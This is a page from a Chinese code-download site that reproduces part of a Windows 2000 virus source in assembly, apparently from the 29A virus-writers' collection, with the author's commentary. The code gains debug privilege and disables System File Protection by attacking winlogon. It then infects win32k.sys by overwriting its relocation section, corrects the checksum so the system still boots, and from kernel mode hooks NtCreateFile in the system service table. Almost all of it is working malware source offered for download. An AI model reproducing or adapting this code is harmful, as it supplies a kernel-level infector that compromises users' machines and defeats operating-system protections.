⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 29a-7.004

📁 从29A上收集的病毒源码
💻 004
📖 第 1 页 / 共 5 页
字号:
🔍
12345 


;;;;;;;;;;;;;;;;;;;;;;;;
push eax                         ;i have unprotected the memory of code of virus
lea esi,[ebp + svirus]
mov ecx,tamvirus
xor ebx,ebx
callz UnprotectMem
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
pop eax				   ;I get other used librarys
mov [ebp + NtKernel],eax
callz GetLibrarys
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]	   ;Ill keep the current directory
GezApi eax,GetCurrentDirectoryACRC,GCDNameLen
lea ebx,[ebp + CurDir]
push ebx
push 256
call eax;we keep current dir for restoring
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov ecx,cs			         ;The virus will work in win2k only		
xor cl,cl
or ecx,ecx
jne Exit
mov eax,[ebp + NtKernel]         ;Im in NT but i want win2k...
GezApi eax,GetVersionCRC,GVNameLen
call eax
test eax,80000000h
jnz Exit
cmp al,5    			   ;i test for win2k(i think XP is 5 too)
jne Exit
;Im not sure if this will work in NT previous machines perhaps but ill code for win2k.
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]	;we go to system32 directory first
GezApi eax,GetWindowsDirectoryACRC,GWDNameLen
push 256
lea ebx,[ebp + Buffer]
push ebx
call eax
lea esi,[ebp + Buffer]
CalcLenString
mov edi,esi
add edi,ecx
mov al,'\'
stosb
mov eax,'tsys'
stosd
mov eax,'23me'
stosd
xor al,al
mov [edi],al
mov eax,[ebp + NtKernel]
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + Buffer]
push esi
call eax
;;;;;;;;;;;;;;;;;;;;;;;;


;I want to enable Debug privilege for token of this user. touch_privilege was coded by Ratter
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtAdvapi]		;enabling debug privilege for this user
GezApi eax,AdjustTokenPrivilegesCRC,ATPNameLen
mov [ebp + tAdjustTokenPrivileges],eax
mov eax,[ebp + NtKernel]
GezApi eax,CloseHandleCRC,CHNameLen
mov [ebp + tCloseHandle],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,LookupPrivilegeValueACRC,LPVNameLen
mov [ebp + tLookupPrivilegeValueA],eax
mov eax,[ebp + NtAdvapi]
GezApi eax,OpenProcessTokenCRC,OPTNameLen
mov [ebp + tOpenProcessToken],eax
mov eax,[ebp + NtKernel]
GezApi eax,GetCurrentProcessCRC,GCPNameLen
mov [ebp + tGetCurrentProcess],eax
push SE_PRIVILEGE_ENABLED
pop eax
@pushsz "SeDebugPrivilege"
pop esi
call touch_privilege
;;;;;;;;;;;;;;;;;;;;;;;;

;Now ill disable sfp with Benny&Ratter method
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
callz GetWinlogon			;I have debug priv so ill disable sfc with benny&ratter method
or eax,eax
jnz Exit
callz AttackWinlogon
or eax,eax
jnz Exit
;;;;;;;;;;;;;;;;;;;;;;;;


;Now infection of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;


;U will see in this part lot of move and copy files but i do it for ensuring the 
;perfect working of the virus...I had some problems with sfc disabling due this code
;was executed before sfc disabling code so finally win32k.sys was not infected the first
;time that virus was executed in that system uninfected still...but i have correct that
;problem doing some movings and copyings of files...that file here,that file there and
;virus works perfectly now ;P 



;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA] 	;Search win32k.sy
push eax
lea eax,[ebp + win32ksy]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
cmp eax,0FFFFFFFFh
je NoWin32sySoContinue
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
lea esi,[ebp + win32ksys]
push esi
mov eax,[ebp + NtKernel]		;deleting win32k.sys if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
mov eax,[ebp + NtKernel]            ;renaming win32k.sy to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32ksy]
push esi
call eax 
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
NoWin32sySoContinue:
mov eax,[ebp + NtKernel]              ;we copy win32k.sys to win32k.fuck
GezApi eax,CopyFileACRC,CpFNameLen
push 0
lea esi,[ebp + win32kfuck]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax 
;;;;;;;;;;;;;;;;;;;;;;;;


;Why of this?:
;The original win32k.sys is been used by the system so we can modify it...however we can
;change its name. We copy it to win32k.fuck and infect the .fuck file...
;later we renaming win32k.sys to win32k.sy and win32k.fuck to win32k.sys
;and this new win32k.sys will be loaded in ring0 the next time that system reboot.
;i copy .sys to .fuck for no infecting directly over win32k.sys
;coz i had problems...i tried to infect directly over win32k.sys but sometimes(lot of times)
;when i called functions as CreateFile or others, i got this error from GetLastError:
;32(20h)(The process cannot access the file because it is being used by another process)
;I supposed that win32k.sys is a file used lot of times and if i infected directly over
;win32k.sys i would get this error lot of times....so finally i decided to do a copy 
;named win32k.fuck for later renaming this file to win32k.sys when already infected.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;Now ill infect win32k.fuck
;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + _WIN32_FIND_DATA]       	;Mapping win32k.fuck
push eax
lea eax,[ebp + win32kfuck]
push eax
mov eax,[ebp + NtKernel]
GezApi eax,FindFirstFileACRC,FFFNameLen
call eax
mov [ebp + SearchHand],eax
cmp eax,0FFFFFFFFh
je Exit
callz MapFile
or eax,eax
jz Exit
;;;;;;;;;;;;;;;;;;;;;;;;


;INFECTION OF WIN32K.FUCK
;;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + ViewHandle]             ;a simple infection overwriting reloc section
mov edx,eax
mov ebx,[eax + 3ch]
add eax,ebx
;eax -> PE
mov bx,word ptr [eax + 8]
cmp bx,'zv'
je StopInfection ;becoz already Infected
mov word ptr [eax + 8],'zv'  ;a small mark ;)
mov ebx,[eax + 28h]	     ;EPoint of win32k.sys
mov [ebp + EntryPointWin32ksys],ebx
xor ecx,ecx
mov cx,word ptr [eax + 6]
dec ecx
mov ebx,eax
add ebx,0F8h ;sections
GoToLastSection:
add ebx,28h
loop GoToLastSection
;ebx -> .reloc				 ;over-reloc infection of win32k.sys
cmp [ebx],'ler.'
jne StopInfection
mov dword ptr [ebx + 24h],040000040h ;reloc not discardable,readable,writable
mov ecx,[ebx + 10h]
cmp ecx,tamvirus
jb  StopInfection

;i change entry point of win32k.sys

mov edi,[ebx + 0ch]
add edi,EPointSystem - svirus
mov [eax + 28h],edi ;RVA new entry point for win32k.sys	

;ill copy the code overwriting .reloc

mov edi,[ebx + 14h]
add edi,edx
lea esi,[ebp + svirus]
mov ecx,tamvirus
rep movsb
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,'vzvz'
StopInfection:			    ;Unmmaping win32k.fuck
push eax
callz CloseAll
pop eax
cmp eax,'vzvz'
jne SysAlreadyInfected
;;;;;;;;;;;;;;;;;;;;;;;;


;IMPORTANT: I MUST CORRECT WIN32K.FUCK HEADER CKSUM AFTER INFECTION OR SYSTEM WILL NOT START
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtImagehlp]		;I correct the cksum of the file win32k.fuck
GezApi eax,MapFileAndCheckSumACRC,MFACSNameLen
lea esi,[ebp + aux]			
push esi					
lea esi,[ebp + Needed]
push esi
lea esi,[ebp + win32kfuck]
push esi
call eax   ;get cksum
callz MapFile
or eax,eax
jz Exit
mov eax,[ebp + ViewHandle]
mov ebx,[eax + 3ch]
add eax,ebx
;eax -> PE
mov ebx,[ebp + aux]
mov [eax + 58h],ebx
callz CloseAll
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
push dword ptr [ebp + SearchHand]   ;Closing the search hand
mov eax,[ebp + NtKernel]
GezApi eax,FindCloseCRC,FCNameLen
call eax
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]            ;renaming win32k.sys to win32k.sy
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksy]
push esi
lea esi,[ebp + win32ksys]
push esi
call eax 
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtKernel]		;renaming win32k.fuck to win32k.sys
GezApi eax,MoveFileACRC,MFNameLen
lea esi,[ebp + win32ksys]
push esi
lea esi,[ebp + win32kfuck]
push esi
call eax 					
;;;;;;;;;;;;;;;;;;;;;;;;



;Exit
;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
Exit:				   
mov eax,[ebp + NtKernel]   				;Exit from virus code...
GezApi eax,SetCurrentDirectoryACRC,SCDNameLen
lea esi,[ebp + CurDir]
push esi
call eax 							;we restore current directory.
callz FreeLibrarys					;free librarys loaded.
or ebp,ebp							;first generation exit, ExitProcess.
jnz gen2Exit
push 0
call ExitProcess
gen2Exit:
mov eax,[ebp + NtKernel]				;second generation exit,jumpin old epoint.
GezApi eax,GetModuleHandleACRC,GMHNameLen   
push 00000000h
call eax
;eax -> this module
add eax,[ebp + EntryPoint]
jmp eax ;old entry point
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;
SysAlreadyInfected:
lea esi,[ebp + win32kfuck]
push esi
mov eax,[ebp + NtKernel]		;deleting win32k.fuck if it would exist
GezApi eax,DeleteFileACRC,DFNameLen
call eax
jmpz Exit
;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Entry Point Of Virus when is executed in ring0.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

EPointSystem:			   ;Ring0 Code
;;;;;;;;;;;;;

push 00000000h                   ;This space in stack will be filled with the entry point
					   ;address of win32k.sys
pushfd
pushad

;;;;;;;;;;;;;;;;;;;;;;;;
callz R0_Doff			   ;i calculate delta offset.
R0_Doff:
pop ebp
sub ebp,offset R0_Doff
;;;;;;;;;;;;;;;;;;;;;;;;



;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + EPointSystem]     ;our target is to search image base of win32k.sys in memory.					
xor ax,ax                        ;hardcoded would be 0A0000000h in my system.		
add eax,1000h
SearchBaseImage:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchBaseImage
;;;;;;;;;;;;;;;;;;;;;;;;


;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + EntryPointWin32ksys]     ;We have the old entry point and the image base
add ebx,eax                             ;so we have the entry point address. We put 
mov [esp + cPushad + cPushfd],ebx       ;that entry point after pushad and pushfd bytes
;;;;;;;;;;;;;;;;;;;;;;;;		    ;in stack for using ret instruction later and 
						    ;for jumping entry point of win32k.sys


;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function
xor ax,ax    				  ;ExCreateCallback).With this address we will get
add  eax,1000h				  ;ntoskrnl base addr
;eax -> a part of ntoskrnl
SearchNtoskrnl:
sub  eax,1000h
cmp  word ptr [eax],'ZM'
jne  SearchNtoskrnl
;eax -> base of ntoskrnl
mov [ebp + Ntoskrnl],eax
;;;;;;;;;;;;;;;;;;;;;;;;




;;;;;;;;;;;;;;;;;;;;;;;;
;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address, 
;syscall number of NtCreateFile, ....
;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable, 
;and this entry is the key for accessing the system service dispatch table where we must
;patch for hooking a service(NtCreateFile for example ;)
;KeServiceDescriptorTable points to a structure like this:
;     {
;	  DWORD ServiceTableBase         - pointer to system service dispatch table(SSDT)
;       DWORD ServiceCounterTable      - not important for us
;       DWORD NumberOfServices         - number of services in system service dispatch table
;	  DWORD ParamTableBase           - pointer to system service parameter table(SSPT)
;	}
;
;We want to get the number of the NtCreateFile service and then we search in this table 
;and we patch the address of NtCreateFile rutine with a address of our code

;;;;;;;;;;;;;;;;;;;;;;;;
;eax = ntoskrnl base
GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen
mov [ebp + KeServiceDescriptorTable],eax
;;;;;;;;;;;;;;;;;;;;;;;;

;ill get SSDT from that service descriptor table

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[eax]
mov [ebp + SSDT],eax
;;;;;;;;;;;;;;;;;;;;;;;;

;now ill get from ntoskrnl the addr for NtCreateFile for searching in the table

;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtCreateFileCRC,NCFNameLen
mov [ebp + NtCreateFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;

;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook

;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
mov eax,[ebp + KeServiceDescriptorTable]
mov ecx,[eax + 8] ;number of services
mov edx,[ebp + NtCreateFileAddr]
SearchNtCreateFileEntry:
mov eax,[ebx + ecx*4 - 4]
cmp eax,edx
loopnz SearchNtCreateFileEntry
;ebx + ecx*4 -> entry
shl ecx,2
add ebx,ecx
;ebx -> entry
mov [ebp + NtCreateFileEntryAddr],ebx
;note we could have finished the entire table without finding the entry...becoz ecx = 0
;so we will compare again
mov eax,[ebx]
cmp eax,edx
jne ReturnWin32ksys
;;;;;;;;;;;;;;;;;;;;;;;;

;We hook NtCreateFile

;;;;;;;;;;;;;;;;;;;;;;;;
;ebx = address of entry of NtCreateFile in SSDT
lea eax,[ebp + NtCreateFileHookRutine]
mov [ebx],eax   					;in this moment we HOOK NtCreateFile
12345

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -